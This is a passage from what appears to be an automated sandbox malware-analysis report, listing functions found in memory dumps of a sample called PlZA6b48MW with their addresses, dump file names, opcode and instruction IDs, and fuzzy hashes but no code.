                                                                            • Opcode Fuzzy Hash: ba6d858317dfcaf6428f89d24784d6269108512cad9d645248c843e3b6bebaff
                                                                            • Instruction Fuzzy Hash: 4EF03011B1F85F4EE77961F818B407C1982CB84250B5A097AEC4BCB2F2ED4C7E5253D5
                                                                            Function 00007FFD9BC70F5C Relevance: .0, Instructions: 31COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 71ad726d5a77e6c61502c7a456a7c1efda4266fa0a03b2f0f4fb76add4abd4c4
                                                                            • Instruction ID: 358176d80678121ad95a70a4e2877c1a40445b8a28777bece13f6e64a99af6c7
                                                                            • Opcode Fuzzy Hash: 71ad726d5a77e6c61502c7a456a7c1efda4266fa0a03b2f0f4fb76add4abd4c4
                                                                            • Instruction Fuzzy Hash: 2CE03902B2F80F4AEB7861F814B04BC0042DB88E55F560135E40AC72E6EC486A4513D5
                                                                            Function 00007FFD9BC76678 Relevance: .0, Instructions: 29COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 41afb21f53cb76c4a0bcb4080394f9a2f38e5421f9108c7d69b8c3e33e387927
                                                                            • Instruction ID: e771433bddd475df4ef1194f07785369b7e044aceedfbc6e2a199a734bcecb81
                                                                            • Opcode Fuzzy Hash: 41afb21f53cb76c4a0bcb4080394f9a2f38e5421f9108c7d69b8c3e33e387927
                                                                            • Instruction Fuzzy Hash: 73F0E20074F78F8AFA3496F580B027C2A10EF82300FA601BED94EC71E3C82977099392
                                                                            Function 00007FFD9B8BB620 Relevance: .0, Instructions: 27COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: f5b3193855c11d29d9abef0857f41e81d3fe71dfda2401c418487087779adde7
                                                                            • Instruction ID: e28ce4173a8e412c5bea0b82bd9e50c8deab70beb668483cf558c0399b989dd2
                                                                            • Opcode Fuzzy Hash: f5b3193855c11d29d9abef0857f41e81d3fe71dfda2401c418487087779adde7
                                                                            • Instruction Fuzzy Hash: 5DD02B30760F0C074B2CA52E6445471B3D5C79E206344427E945BC3394DC50EC8247C4
                                                                            Function 00007FFD9B8B8569 Relevance: .0, Instructions: 24COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a2465e01ea4ac97ab3e2de273fdc5145cb18f02fa69729f289504ed41e38a266
                                                                            • Instruction ID: c70246ddd5040e574de049dd74fc413e3ba539c874c4913a7625ba8751b46824
                                                                            • Opcode Fuzzy Hash: a2465e01ea4ac97ab3e2de273fdc5145cb18f02fa69729f289504ed41e38a266
                                                                            • Instruction Fuzzy Hash: 6FE01A2594F7C04FC70B9B3588A88557F60AE6721174A41EBC085CF2F3EA19D94AC752
                                                                            Function 00007FFD9B8B2AE8 Relevance: .0, Instructions: 23COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 8649a965de4da12c5528bc2c4cdc8f90d9e9034a07af31b724d9d83874f3a925
                                                                            • Instruction ID: 5f4b97b0460cc3ccd498a3c324c62b1b5f24bbf6e6054637811685f2a3b88d92
                                                                            • Opcode Fuzzy Hash: 8649a965de4da12c5528bc2c4cdc8f90d9e9034a07af31b724d9d83874f3a925
                                                                            • Instruction Fuzzy Hash: 27D05E30B10D0D4B8B1CA63D886C470B3D1E7A9202794526A940AC22A5ED25ECC5CB80
                                                                            Function 00007FFD9B8BF2C0 Relevance: .0, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                            Function 00007FFD9B8BB170 Relevance: .0, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                            Function 00007FFD9B8BB0E0 Relevance: .0, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                            Function 00007FFD9B8B2460 Relevance: .0, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                            • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                            • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                            • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                            Function 00007FFD9B8863FD Relevance: .0, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6dd9cd3213a896cf790c4d9ce7bc352bba50e1bed93a52f4d2e193527653a186
                                                                            • Instruction ID: fa08f5221e5ed7645081954279ca229d6dcb7f20cbbb5916d11753e108791eb3
                                                                            • Opcode Fuzzy Hash: 6dd9cd3213a896cf790c4d9ce7bc352bba50e1bed93a52f4d2e193527653a186
                                                                            • Instruction Fuzzy Hash: B3E0ED21A0A91A87FBA4A384CC60BB96265EF58300F1601B8D95E933D1CD38AF40C645
                                                                            Function 00007FFD9B893B70 Relevance: .0, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                            • Instruction ID: 624740e71dae718bcd56c73aa6ef227b29225f906b2275ca74e504422623924a
                                                                            • Opcode Fuzzy Hash: b7b5e071f3789eae717b10c0ffdfc75cd0be3c54ec7eb2e14fd012d674173004
                                                                            • Instruction Fuzzy Hash: E0D0A930B60A0C4B8B0CB63D8858430B3D2E7AA20A384627C940BC3281ED25ECCACB80
                                                                            Function 00007FFD9B8BF853 Relevance: .0, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: bb128fc7f06bb29f3b2e9c87cb38ab95f1c6331311d4ba6976cf97c012079144
                                                                            • Instruction ID: 28e339778359222ca2b6e7caea6826965bebbdeb5899b1d9bca6a81e182a4d97
                                                                            • Opcode Fuzzy Hash: bb128fc7f06bb29f3b2e9c87cb38ab95f1c6331311d4ba6976cf97c012079144
                                                                            • Instruction Fuzzy Hash: 8DE0867061D7486FC754EB14D49289AB7E0FFD8350F80193DF04A83360DA20A541CB42
                                                                            Function 00007FFD9B89A397 Relevance: .0, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b890000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: ce7979cce9924bfe44c257a0725152729498d5cd81a3198211bca407269e6887
                                                                            • Instruction ID: a8db76b4fe6a0d549640ce24d33e48972b017405c4e54113587b6faeaa6511d4
                                                                            • Opcode Fuzzy Hash: ce7979cce9924bfe44c257a0725152729498d5cd81a3198211bca407269e6887
                                                                            • Instruction Fuzzy Hash: 3DE04F35F0D51E4BFB289B80D4A06F933919F19310F124176C86EA76E2DD2C7B024691
                                                                            Function 00007FFD9B8C8688 Relevance: .0, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 568d613dfe855f0ca9bd458f86e6ec3908c81d28d69fedfcfbac3cc6f287c5d4
                                                                            • Instruction ID: 053246fc2d4419831dd7225caf69ad875622a821ff5b6d9faeb45277f8b4b971
                                                                            • Opcode Fuzzy Hash: 568d613dfe855f0ca9bd458f86e6ec3908c81d28d69fedfcfbac3cc6f287c5d4
                                                                            • Instruction Fuzzy Hash: E2D0C930B619088F8B5CB72C8C9997072E1EB6E21679540A9D00AC72B1E96AD989C741
                                                                            Function 00007FFD9B8C4468 Relevance: .0, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b1e85018f7e6949d5cd2db459066d8891e2ef039ba2238e875405c0e0ca85b26
                                                                            • Instruction ID: 4413152765e024b164d43ad0bc8ffcec9ca3c59d22fc5f2e53bc8c74bf504031
                                                                            • Opcode Fuzzy Hash: b1e85018f7e6949d5cd2db459066d8891e2ef039ba2238e875405c0e0ca85b26
                                                                            • Instruction Fuzzy Hash: 98D0C930B619084F8B5CAB2C885997072D1EBAE216B9941A9D00AC76B1E96AD989C741
                                                                            Function 00007FFD9B880B95 Relevance: .0, Instructions: 19COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: cd0543b9d0adc4329eb618c7f976545b6d033392820df751358e15f734ce46fd
                                                                            • Instruction ID: 574516e6861bcbd8945eb7022d076ee537c62d37ccb9b8b8cff6e0c7a3cdfdc4
                                                                            • Opcode Fuzzy Hash: cd0543b9d0adc4329eb618c7f976545b6d033392820df751358e15f734ce46fd
                                                                            • Instruction Fuzzy Hash: DED0A73061995E4FE601F778D8499547BD0FB1F211BD914E1D008C7561D51489558B00
                                                                            Function 00007FFD9B8B4970 Relevance: .0, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                            Function 00007FFD9B8B2940 Relevance: .0, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                            Function 00007FFD9B8B2F40 Relevance: .0, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                            Function 00007FFD9B8B8E10 Relevance: .0, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                            • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                            • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                            • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                            Function 00007FFD9BC70B87 Relevance: .0, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: db4211681fea4ce99da318f2d38d411b9616b87102d477dc7329546854cd2f68
                                                                            • Instruction ID: 4d19417bcafb606d9f626f235441f207c868e3124d81ffd7d15a3f96ff15d9ec
                                                                            • Opcode Fuzzy Hash: db4211681fea4ce99da318f2d38d411b9616b87102d477dc7329546854cd2f68
                                                                            • Instruction Fuzzy Hash: 3BE0CD41A0F3CA4BEB3707B0047153C2F51DF17709B0A01F5D4858F1D3D9983A048311
                                                                            Function 00007FFD9B8B7B38 Relevance: .0, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 04c1c6d9c824028f99833788fd15f65cd4f4727decb6c3c1ac9e86fb209162a0
                                                                            • Instruction ID: 1d70dc4a6cf14a8ac72f355c10c9630aeda306c62e58cf01d004ba752aa5741e
                                                                            • Opcode Fuzzy Hash: 04c1c6d9c824028f99833788fd15f65cd4f4727decb6c3c1ac9e86fb209162a0
                                                                            • Instruction Fuzzy Hash: 8CD01234B519044FC71CA7388859C747391EB6E21679540A9D00AD72B2E96ADD89CB81
                                                                            Function 00007FFD9B8C51E8 Relevance: .0, Instructions: 17COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 16dc95c6c00bfe46c33ce37c882339430c4dc08d3dfc8fd717c30d1584055869
                                                                            • Instruction ID: 4da3fc82b2ac37a92c75f1c19e6259c45cac6d76b64cf07833324750ba3fbd67
                                                                            • Opcode Fuzzy Hash: 16dc95c6c00bfe46c33ce37c882339430c4dc08d3dfc8fd717c30d1584055869
                                                                            • Instruction Fuzzy Hash: B0E012706186498FDB10FF58CC56D7A73F0FB68300F024625945AC3160CF34F9918B81
                                                                            Function 00007FFD9B8C4C65 Relevance: .0, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B8B2000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8B2000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b8b2000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 6f8657a9984ae42db377f0fe2e2a2e5c1e448a03f21b25e7109a78dde782e51f
                                                                            • Instruction ID: 835072e0f6c6c0d74c71db43e7cf94e77a405acba36c0ffa9ed23c5433622e63
                                                                            • Opcode Fuzzy Hash: 6f8657a9984ae42db377f0fe2e2a2e5c1e448a03f21b25e7109a78dde782e51f
                                                                            • Instruction Fuzzy Hash: 51C08C40F2F40F07DB2533FA183B0BCA5905F8D104FDA08B7D408C11E3DC1D12A90242
                                                                            Function 00007FFD9B8806A5 Relevance: .0, Instructions: 13COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7cad09872e0d0da1e2d5384aa9319a54457501d03356f0f19a341ea23ddec882
                                                                            • Instruction ID: 2677fc7bfd2683c693b646420594209abae2644c2d195145f1bceb9e5f756f74
                                                                            • Opcode Fuzzy Hash: 7cad09872e0d0da1e2d5384aa9319a54457501d03356f0f19a341ea23ddec882
                                                                            • Instruction Fuzzy Hash: A8C00205F6BE1E02E825B7AA98660ACA1446FDDA10FEB0172D569501A1A86E22960196
                                                                            Function 00007FFD9B880B18 Relevance: .0, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: b06f1791d9c404b6da8188d13b2bf43d86fda8b6c16fb441b2d0ee5fe7e0b47f
                                                                            • Instruction ID: 15bb9bc3bc112feedbc9b838f7070e83bd3d138886bce8923a2e83841389257d
                                                                            • Opcode Fuzzy Hash: b06f1791d9c404b6da8188d13b2bf43d86fda8b6c16fb441b2d0ee5fe7e0b47f
                                                                            • Instruction Fuzzy Hash: 6AC08C305118188FCA00EB2CC88480032E0FB0E210BC200D0E40DC7170E22ADC80C740
                                                                            Function 00007FFD9B880708 Relevance: .0, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2f6d768d52db0de072cd9d8697469d67e80ecdc4b026ab0b8af17efe8a05b681
                                                                            • Instruction ID: 92da1a6195390a128e4c3615b791da124b184d468970600401a4c2ae4e15012d
                                                                            • Opcode Fuzzy Hash: 2f6d768d52db0de072cd9d8697469d67e80ecdc4b026ab0b8af17efe8a05b681
                                                                            • Instruction Fuzzy Hash: 52C04C345618098FC954E76ED98995476A0FB0D205BD610D0E409CB165E66A99548B41
                                                                            Function 00007FFD9B881280 Relevance: .0, Instructions: 12COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9b880000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 3265276eb29e93b0456f4b63c2112c0fba9dc83055499a3600fa307922ce2c4c
                                                                            • Instruction ID: 6a00049e8ca182c2eb4530ae5ea2728430e17252d36e448b6e55ee6a9536c2e8
                                                                            • Opcode Fuzzy Hash: 3265276eb29e93b0456f4b63c2112c0fba9dc83055499a3600fa307922ce2c4c
                                                                            • Instruction Fuzzy Hash: 1FC08C30551C0C8FC908FB68C89481433A0FB0D300BC20090E008C71B0D229DCD1C740
                                                                            Function 00007FFD9BC7166B Relevance: .0, Instructions: 11COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2605908935.00007FFD9BC70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BC70000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_47_2_7ffd9bc70000_PlZA6b48MW.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 2db0abfd7043c5346f8301486abd97a43e4486f59773c0113c882262dc8c6a12
                                                                            • Instruction ID: e6ec95863f5a116235c0dc407916e0ca9875e18f9404ecf3f4868e48f313a05c
                                                                            • Opcode Fuzzy Hash: 2db0abfd7043c5346f8301486abd97a43e4486f59773c0113c882262dc8c6a12
                                                                            • Instruction Fuzzy Hash: 30D09210B0F54F89F2399AF280B023D15A4DF05700F2B007AC05F428E1C92CBA016622
                                                                            Function 00007FFD9B881E15 Relevance: .0, Instructions: 10COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 0000002F.00000002.2427763799.00007FFD9B880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B880000, based on PE: false
